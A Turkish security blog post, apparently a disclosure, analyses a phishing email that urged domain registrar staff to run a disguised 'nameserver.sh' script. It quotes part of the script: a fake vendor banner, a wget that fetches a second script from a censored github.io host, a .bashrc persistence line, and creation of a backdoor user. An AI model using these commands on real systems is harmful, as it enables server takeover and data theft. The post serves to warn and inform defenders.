Bu sabah saatlerinde, isim tescil firmalarına fake bir mailden mail atıldı bknz ” [email protected]” olarak ve mesaj iceriği şoyle idi
Yani burada kurbanlara nameserverlerini guncellediğini ve şirket yetkililerine sunucularında “nameserver.sh” adlı dosyayı calıştırmalarını istiyor
peki bu verdikleri nameserver.sh ne işe yarıyor?
bu nameserver.sh yi sunucuda calıştığı andan itibaren sunucuda bir “isimtescil” adında bir kullanıcı acıyor ve sudo yetkileri veriyor ve sunucudaki bazı kayıtları onceden belirlenmiş bir mail adresine mail olarak gonderiyor
peki bu nameserver iceriğine bir goz atalım, securitylab olarak kimseyi zan altında bırakmak istemediğimiz icin icinde gecen isimleri sansurluyoruz.
Kod:
echo "FBS Bilisim Cozumleri - www.isimtescil.net / NS Auto Update - 2019 Lisanslı" echo "internet baglantiniz kontrol ediliyor islem uzun surerse 'ctrl+c' yapiniz" ping 93.89.226.20 cd /root/ wget https://b*****.github.io/isimtescil.sh -P /usr
Kod:
echo "bash /usr/isimtescil.sh" > .bashrc echo "Baglanti Basarili NS Adresleri Otomatik Guncelleniyor.." adduser isimtescil